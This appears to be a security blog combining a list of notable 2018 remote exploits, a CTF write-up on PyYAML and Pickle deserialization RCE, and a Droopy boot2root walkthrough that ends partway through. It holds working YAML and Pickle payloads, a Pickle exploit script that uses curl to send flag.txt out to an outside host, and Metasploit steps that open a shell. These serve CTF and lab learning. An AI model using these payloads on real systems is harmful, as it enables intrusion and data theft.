Top 10 Remote Exploits of 2018

With 2018 over, I thought it would be useful to look back at the most notable exploits to come out in the last year and provide a brief review for each. My criteria here is to provide a list of the most notable remote exploits (in my opinion…) affecting the most systems with the highest impact and released in 2018 only. This is by no means a complete list and I may have missed some. If so, let me know via Twitter (@xer0dayz) or leave a comment. Also, if there’s any remote exploits you think I should add to Sn1per (https://github.com/1N3/Sn1per), let me know!

OpenSSH User Enum Exploit CVE-2018-15473

OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

Exploit Link: https://github.com/Rhynorater/CVE-2018-15473-Exploit

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

libSSH Auth Bypass Exploit CVE-2018-10933

A vulnerability was found in libssh’s server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.

Exploit Link: https://github.com/leapsecurity/libssh-scanner

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

Drupal v7.x + v8.x Remote Code Execution (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)

 

A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.

Exploit Link: https://github.com/dreadlocked/Drupalgeddon2

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

Apache Struts 2 Remote Code Execution CVE-2018-11776

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn’t have value and action set and in same time, its upper package have no or wildcard namespace.

Exploit Link: https://github.com/mazen160/struts-pwn_CVE-2018-11776

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

WebLogic Unrestricted File Upload Remote Code Execution CVE-2018-2894

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS – Web Services). Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Exploit Link: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/WebLogic%20CVE-2018-2894.py

Cisco ASA Directory Traversal CVE-2018-0296

A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029.

Exploit Link: https://github.com/yassineaboukir/CVE-2018-0296

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

Exim < 4.90.1 Remote Code Execution CVE-2018-6789

An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.

Exploit Link: https://www.exploit-db.com/exploits/44571

* To be added to Sn1per v6.1 at a future date.

DHCP Client Command Injection (DynoRoot) CVE-2018-1111

DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.

Exploit Link: https://github.com/kkirsche/CVE-2018-1111

osCommerce 2.3.4.1 Installer Unauthenticated Code Execution

If the /install/ directory was not removed, it is possible for an unauthenticated attacker to run the “install_4.php” script, which will create the configuration file for the installation. This allows the attacker to inject PHP code into the configuration file and execute it.

Exploit Link: https://www.rapid7.com/db/modules/exploit/multi/http/oscommerce_installer_unauth_code_exec

* To be added to Sn1per v6.1 at a future date.

Oracle Weblogic Server Deserialization RCE CVE-2018-2628

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Exploit Link: https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

Exploiting Python Deserialization Vulnerabilities

Over the weekend, I had a chance to participate in the ToorConCTF (https://twitter.com/toorconctf) which gave me my first experience with serialization flaws in Python. Two of the challenges we solved included Python libraries that appeared to be accepting serialized objects and ended up being vulnerable to Remote Code Execution (RCE). Since I struggled a bit to find reference material online on the subject, I decided to make a blog post documenting my discoveries, exploit code and solutions. In this blog post, I will cover how to exploit deserialization vulnerabilities in the PyYAML (a Python YAML library) and Python Pickle libraries (a Python serialization library). Let’s get started!

Background


Before diving into the challenges, it’s probably important to start with the basics. If you are unfamilliar with deserialization vulnerabilities, the following exert from @breenmachine at Fox Glove Security (https://foxglovesecurity.com) probably explains it the best.

“Unserialize vulnerabilities are a vulnerability class. Most programming languages provide built-in ways for users to output application data to disk or stream it over the network. The process of converting application data to another format (usually binary) suitable for transportation is called serialization. The process of reading data back in after it has been serialized is called unserialization. Vulnerabilities arise when developers write code that accepts serialized data from users and attempt to unserialize it for use in the program. Depending on the language, this can lead to all sorts of consequences, but most interesting, and the one we will talk about here is remote code execution.”

PyYAML Deserialization Remote Code Execution


In the first challenge, we were presented with a URL to a web page which included a YAML document upload form. After Googling for YAML document examples, I crafted the following YAML file and proceeded to upload it to get a feel for the functionality of the form.

HTTP Request


POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 857

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

---
# A list of global configuration variables
# # Uncomment lines as needed to edit default settings.
# # Note this only works for settings with default values. Some commands like --rerun <module>
# # or --force-ccd n will have to be set in the command line (if you need to)
#
# # This line is really important to set up properly
# project_path: '/home/user'
#
# # The rest of the settings will default to the values set unless you uncomment and change them
# #resize_to: 2048
'test'
-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="upload"


-----------------------------200783363553063815533894329--

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Sun, 03 Sep 2017 02:50:16 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2213
Set-Cookie: session=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/

<!-- begin message block -->
<div class="container flashed-messages">
  <div class="row">
    <div class="col-md-12">
      <div class="alert alert-info" role="alert">

        test.yaml is valid YAML
      </div>
    </div>
  </div>
</div>
<!-- end message block -->

    </div>

</div>

  <div class="container main" >
    <div class="row">
        <div class="col-md-12 main">
            
  <code></code>

As you can see, the document was uploaded successfully but only displayed whether the upload was a valid YAML document or not. At this point, I wasn’t sure exactly what I was supposed to do, but after looking more closely at the response, I noticed that the server was running gunicorn/19.7.1…

A quick search for gunicorn revealed that it is a Python web server which lead me to believe the YAML parser was in fact a Python library. From here, I decided to search for Python YAML vulnerabilities and discovered a few blog posts referencing PyYAML deserialization flaws. It was here that I came across the following exploit code for exploiting PyYAML deserialization vulnerabilities. The important thing here is the following code which runs the ‘ls’ command if the application is vulnerable to PyYaml deserialization:


!!map {
  ? !!str "goodbye"
  : !!python/object/apply:subprocess.check_output [
    !!str "ls",
  ],
}

Going blind into the exploitation phase, I decided to give it a try and inject the payload into the document contents being uploaded using Burpsuite…

HTTP Request


POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 445

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

---
!!map {
  ? !!str "goodbye"
  : !!python/object/apply:subprocess.check_output [
    !!str "ls",
  ],
}

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="upload"


-----------------------------200783363553063815533894329--

<ul><li><code>goodbye</code> : <code>Dockerfile
README.md
app.py
app.pyc
bin
boot
dev
docker-compose.yml
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
requirements.txt
root
run
sbin
srv
static
sys
templates
test.py
tmp
usr
var
</code></li></ul>

As you can see, the payload worked and we now have code execution on the target server! Now, all we need to do is read the flag.txt…

I quickly discovered a limitaton of the above method was strictly limited to single commands (ie. ls, whoami, etc.) which meant there was no way to read the flag using this method. I then discovered that the os.system Python call could also be to achieve RCE and was capable of running multiple commands inline. However, I was quickly disasspointed after trying this and seeing that the result just returned “0” and I could not see my command output. After struggling to find the solution, my teamate @n0j pointed out that the os.system [“command_here” ] only returns a “0” exit code if the command is successful and is blind due to how Python handles sub process execution. It was here that I tried injecting the following command to read the flag: curl https://crowdshield.com/?`cat flag.txt`

HTTP Request


POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 438

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

---
"goodbye": !!python/object/apply:os.system ["curl https://crowdshield.com/?`cat flag.txt`"]

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="upload"


-----------------------------200783363553063815533894329--


</div>

  <div class="container main" >
    <div class="row">
        <div class="col-md-12 main">
            
  <ul><li><code>goodbye</code> : <code>0</code></li></ul>
            
        </div>
    </div>
  </div>

After much trial and error, the flag was ours along with 250pts in the CTF!

Remote Apache Logs


34.214.16.74 - - [02/Sep/2017:21:12:11 -0700] "GET /?ItsCaptainCrunchThatsZeldasFavorite HTTP/1.1" 200 1937 "-" "curl/7.38.0"

 

Python Pickle Deserialization


In the next CTF challenge, we were provided a host and port to connect to (ganon.39586ebba722e94b.ctf.land:8000). After initial connection however, no noticable output was displayed so I proceeded to fuzz the open port with random characters and HTTP requests to see what happened. It wasn’t until I tried injecting a single “‘” charecter that I received the error below:


# nc -v ganon.39586ebba722e94b.ctf.land 8000
ec2-34-214-16-74.us-west-2.compute.amazonaws.com [34.214.16.74] 8000 (?) open
cexceptions
AttributeError
p0
(S"Unpickler instance has no attribute 'persistent_load'"
p1
tp2
Rp3
.

The thing that stood out most was the (S”Unpickler instance has no attribute ‘persistent_load'” portion of the output. I immediately searched Google for the error which revealed several references to Python’s serialization library called “Pickle”.

It soon became clear that this was likely another Python deserialization flaw in order to obtain the flag. I then searched Google for “Python Pickle deserialization exploits” and discovered a similar PoC to the code below. After tinkering with the code a bit, I had a working exploit that would send Pickle serialized objects to the target server with the commands of my choice.

Exploit Code


#!/usr/bin/python
# Python Pickle De-serialization Exploit by [email protected] - https://crowdshield.com
#

import os
import cPickle
import socket
import os

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        # Note: this will only list files in your directory.
        # It is a proof of concept.
        return (os.system, ('curl https://crowdshield.com/.injectx/rce.txt?`cat flag.txt`',))

def serialize_exploit():
    shellcode = cPickle.dumps(Exploit())
    return shellcode

def insecure_deserialize(exploit_code):
    cPickle.loads(exploit_code)

if __name__ == '__main__':
    shellcode = serialize_exploit()
    print shellcode

    soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    soc.connect(("ganon.39586ebba722e94b.ctf.land", 8000))
    print soc.recv(1024)

    soc.send(shellcode)
    print soc.recv(1024)
    soc.close()
Exploit PoC


# python python_pickle_poc.py
cposix
system
p1
(S"curl https://crowdshield.com/rce.txt?`cat flag.txt`"
p2
tp3
Rp4
.

Much to my surprise, this worked and I could see the contents of the flag in my Apache logs!

Remote Apache Logs


34.214.16.74 - - [03/Sep/2017:11:15:02 -0700] "GET /rce.txt?UsuallyLinkPrefersFrostedFlakes HTTP/1.1" 404 2102 "-" "curl/7.38.0"

Conclusion


So there you have it. Two practicle examples of Python serialization which can be used to obtain Remote Code Execution (RCE) in remote applications. I had a lot of fun competing in the CTF and learned a lot in the process, but due to other obligations time constraints I wasn’t able to put my entire focus into the CTF. In the end, our team “SavageSubmarine” placed 7th overall. Till next time…

-1N3

 

Droopy Boot2Root CTF Solution

Overview

This is a step by step walk through for the Droopy CTF Boot2Root VM which can be downloaded here. Some output has been omitted for brevity, but you get the drift 😉 Enjoy! -1N3 @CrowdShield

Enumeration

As with most pentests, I rely mainly on Sn1per which can be downloaded here to quickly enumerate targets and pinpoint possible exploit vectors…

  • # sniper 192.168.1.66 web report
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://crowdshield.com
 + -- --=[sn1per v1.7 by 1N3

################################### Running TCP port scan ##########################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-11 08:28 MST
Nmap scan report for 192.168.1.66
Host is up (0.00027s latency).
Not shown: 35 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:4E:A5:E0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.66
+ Target Hostname:    192.168.1.66
+ Target Port:        80
+ Start Time:         2016-05-11 08:28:13 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280 
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8384 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time:           2016-05-11 08:28:36 (GMT-7) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________


[!] [!] The remote website is up, but does not seem to be running WordPress.

[-] Date & Time: 11/05/2016 08:28:42
[-] Target: http://192.168.1.66
[M] Website Not in HTTPS: http://192.168.1.66
[I] Server: Apache/2.4.7 (Ubuntu)
[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.1.66/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.30
[H] Drupal Vulnerable to SA-CORE-2014-005
[-] Date & Time: 11/05/2016 08:30:00
[-] Completed in: 0:01:18

[-] Date & Time: 11/05/2016 08:30:01
[-] Target: http://192.168.1.66/wordpress

Exploitation

Since we now know the site is vulnerable to SA-CORE-2014-005 (ie. Drupageddon), we can quickly find the exploit using Findsploit which can be downloaded here.

   ___ _           _           _       _ _   
  / __(_)_ __   __| |___ _ __ | | ___ (_) |_ 
 / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
/ /   | | | | | (_| \__ \ |_) | | (_) | | |_ 
\/    |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
                        |_|                  

+ -- --=[findsploit v1.3 by 1N3
+ -- --=[https://crowdshield.com

+ -- --=[SEARCHING:  drupal   

+ -- --=[NMAP SCRIPTS

/usr/share/nmap/scripts/http-drupal-enum.nse
/usr/share/nmap/scripts/http-drupal-enum-users.nse

+ -- --=[METASPLOIT EXPLOITS

msf_search/auxiliary:   gather/drupal_openid_xxe                                       2012-10-17       normal  Drupal OpenID External Entity Injection
msf_search/auxiliary:   scanner/http/drupal_views_user_enum                            2010-07-02       normal  Drupal Views Module Users Enumeration
msf_search/exploits:   multi/http/drupal_drupageddon                                  2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection

+ -- --=[Press any key to search online or Ctrl+C to exit...

Drupageddon Exploit

After, we quickly load up the exploit using Metasploit and fire away for an easy shell…

  • msf exploit(drupal_drupageddon) > set RHOST 192.168.1.66
RHOST => 192.168.1.66
  • msf exploit(drupal_drupageddon) > exploit
[*] 192.168.1.66:80 - Testing page
[*] Started bind handler
[*] 192.168.1.66:80 - Creating new user KJGWAaMEnU:QwWtLlTZxw
[*] 192.168.1.66:80 - Logging in as KJGWAaMEnU:QwWtLlTZxw
[*] 192.168.1.66:80 - Trying to parse enabled modules
[*] 192.168.1.66:80 - Enabling the PHP filter module
[*] 192.168.1.66:80 - Setting permissions for PHP filter module
[*] 192.168.1.66:80 - Getting tokens from create new article page
[*] 192.168.1.66:80 - Calling preview page. Exploit should trigger...
[*] Sending stage (32461 bytes) to 192.168.1.66
[*] Meterpreter session 1 opened (192.168.1.60:58733 -> 192.168.1.66:4444) at 2016-04-29 14:04:18 -0700
  • meterpreter > ls
Listing: /var/www/html
======================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  89339  fil   2014-12-11 06:11:45 -0700  CHANGELOG.txt
100644/rw-r--r--  1481   fil   2014-12-11 06:11:45 -0700  COPYRIGHT.txt
100644/rw-r--r--  1717   fil   2014-12-11 06:11:45 -0700  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2014-12-11 06:11:45 -0700  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2014-12-11 06:11:45 -0700  INSTALL.sqlite.txt
100644/rw-r--r--  17995  fil   2014-12-11 06:11:45 -0700  INSTALL.txt
100664/rw-rw-r--  18092  fil   2014-12-11 06:11:45 -0700  LICENSE.txt
100644/rw-r--r--  8542   fil   2014-12-11 06:11:45 -0700  MAINTAINERS.txt
100644/rw-r--r--  5382   fil   2014-12-11 06:11:45 -0700  README.txt
100644/rw-r--r--  9642   fil   2014-12-11 06:11:45 -0700  UPGRADE.txt
100644/rw-r--r--  6604   fil   2014-12-11 06:11:45 -0700  authorize.php
100644/rw-r--r--  720    fil   2014-12-11 06:11:45 -0700  cron.php
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  includes
100644/rw-r--r--  11510  fil   2014-12-11 06:11:45 -0700  index.html
100644/rw-r--r--  529    fil   2014-12-11 06:11:45 -0700  index.php
100644/rw-r--r--  20     fil   2014-12-11 06:11:45 -0700  info.php
100644/rw-r--r--  703    fil   2014-12-11 06:11:45 -0700  install.php
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  misc
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  modules
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  profiles
100644/rw-r--r--  1550   fil   2014-12-11 06:11:45 -0700  robots.txt
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  scripts
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  sites
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  themes
100644/rw-r--r--  19986  fil   2014-12-11 06:11:45 -0700  update.php
100644/rw-r--r--  2178   fil   2014-12-11 06:11:45 -0700  web.config
100644/rw-r--r--  417    fil   2014-12-11 06:11:45 -0700  xmlrpc.php
  • meterpreter > shell
Process 1227 created.
Channel 0 created.
exit
meterpreter > 

Privilege Escalation

Now that we’ve gained initial access, the next logical step would be to see if we can escalate our privileges to root… To help speed up the process, I wrote a small shell script to quickly enumerate linux based systems for exploit vectors which can be downloaded here.

  • wget 192.168.1.60/linux-privesc.sh
--2016-04-29 22:21:14--  http://192.168.1.60/linux-privesc.sh
Connecting to 192.168.1.60:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14117 (14K) [text/x-sh]
Saving to: 'linux-privesc.sh'

     0K .......... ...                                        100% 12.8M=0.001s

2016-04-29 22:21:14 (12.8 MB/s) - 'linux-privesc.sh' saved [14117/14117]
  • bash linux*
-[Linux Privilege Escalation Script by 1N3]=--
-[http://treadstonesecurity.blogspot.com]=--

#>01 Whats the distribution type? What version?
#>02 What's the Kernel version? Is it 64-bit?
#>03 What can be learnt from the environmental variables?
#>04 Is there a printer?
#>05 What services are running? Which service has which user
#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!
#>07 What applications are installed? What version are they? Are they currently running?
#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
#>09 What jobs are scheduled?
#>10 Any plain text usernames and/or passwords?
#>11 What NIC(s) does the system have? Is it connected to another network?
#>12 What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
#>13 Whats cached? IP and/or MAC addresses
#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
#>15 What sensitive files can be found?
#>16 Anything interesting in the home directorie(s)? If its possible to access
#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
#>18 What has the user being doing? Is there any password in plain text? What have they been edting?
#>19 What user information can be found?
#>20 Can private-key information be found?
#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?
#>22 What can be found in /var/?
#>23 Any settings/files (hidden) on website? Any settings file with database information?
#>24 Is there anything in the log file(s) (Could help with Local File Includes!)
#>25 If commands are limited, you break out of the jail shell?
#>26 How are file-systems mounted?
#>27 Are there any unmounted file-systems?
#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
#>29 SGID (chmod 2000) - run as the  group, not the user who started it.
#>30 SUID (chmod 4000) - run as the  owner, not the user who started it.
#>31 SGID or SUID
#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm
#>33 world-writeable folders
#>34 world-writeable & executable folders
#>35 Any problem files? Word-writeable, nobody files
#>36 world-writeable files
#>37 Noowner files
#>38 What development tools/languages are installed/supported?
#>39 How can files be uploaded?

#>01 Whats the distribution type? What version?
#####################################################################
Ubuntu 14.04.1 LTS \n \l

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

#>02 What's the Kernel version? Is it 64-bit?
#####################################################################
Linux version 3.13.0-43-generic ([email protected]) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Linux 3.13.0-43-generic x86_64
linux-privesc.sh: line 68: rpm: command not found
[    0.000000] Linux version 3.13.0-43-generic ([email protected]) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 (Ubuntu 3.13.0-43.72-generic 3.13.11.11)
[    0.373742] [Firmware Bug]: ACPI: BIOS _OSI(Linux) query ignored
[    0.947541] Linux agpgart interface v0.103
vmlinuz-3.13.0-43-generic

Finding A Local Root Exploit

